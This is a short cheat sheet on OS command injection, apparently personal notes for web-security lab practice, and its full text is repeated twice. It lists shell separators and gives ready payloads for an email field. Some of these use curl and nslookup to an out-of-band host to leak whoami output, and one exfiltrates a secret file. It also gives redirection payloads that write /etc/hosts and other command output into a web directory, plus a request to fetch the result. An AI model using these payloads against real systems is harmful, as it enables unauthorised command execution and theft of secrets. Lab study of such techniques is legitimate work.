OS Cmd Injection

Using seperators to inject command

 &&
 &
 ||
 |
 ;
 `
 '
 "
 0x0a
 \n

Feedback injection in mail

email=carlos@exam.net||curl+`whoami`.OASTIFY.COM||

||$(curl $(cat /home/carlos/secret).OASTIFY.COM)||

email=peanut2019@nuts.net||nslookup+`whoami`.OASTIFY.COM||

Output redirection

If OS command injection identified, and filter in place preventing complex command injection, attempt to redirect output to writable folder. Identify a path traversal vulnerability that allow reading of files only in current WEB APP.

Identify the working directory using pwd command output redirected, and appending to output.txt file every bash command stdout.

||pwd>output.txt||
||echo>>output.txt||
||cat+/etc/hosts>>/var/www/images/output.txt||
||echo>>output.txt||
||ls+-al>>/var/www/images/output.txt||
||echo>>output.txt||
||whoami>>/var/www/images/output.txt||

get output data

GET /image?filename=output.txt HTTP/2

PreviousInsecure Desarialization Nextgraphql api vulns

Last updated 5 months ago

OS Cmd Injection

Using seperators to inject command

 &&
 &
 ||
 |
 ;
 `
 '
 "
 0x0a
 \n

Feedback injection in mail

email=carlos@exam.net||curl+`whoami`.OASTIFY.COM||

||$(curl $(cat /home/carlos/secret).OASTIFY.COM)||

email=peanut2019@nuts.net||nslookup+`whoami`.OASTIFY.COM||

Output redirection

If OS command injection identified, and filter in place preventing complex command injection, attempt to redirect output to writable folder. Identify a path traversal vulnerability that allow reading of files only in current WEB APP.

Identify the working directory using pwd command output redirected, and appending to output.txt file every bash command stdout.

||pwd>output.txt||
||echo>>output.txt||
||cat+/etc/hosts>>/var/www/images/output.txt||
||echo>>output.txt||
||ls+-al>>/var/www/images/output.txt||
||echo>>output.txt||
||whoami>>/var/www/images/output.txt||

get output data

GET /image?filename=output.txt HTTP/2

PreviousInsecure Desarialization Nextgraphql api vulns

Last updated 5 months ago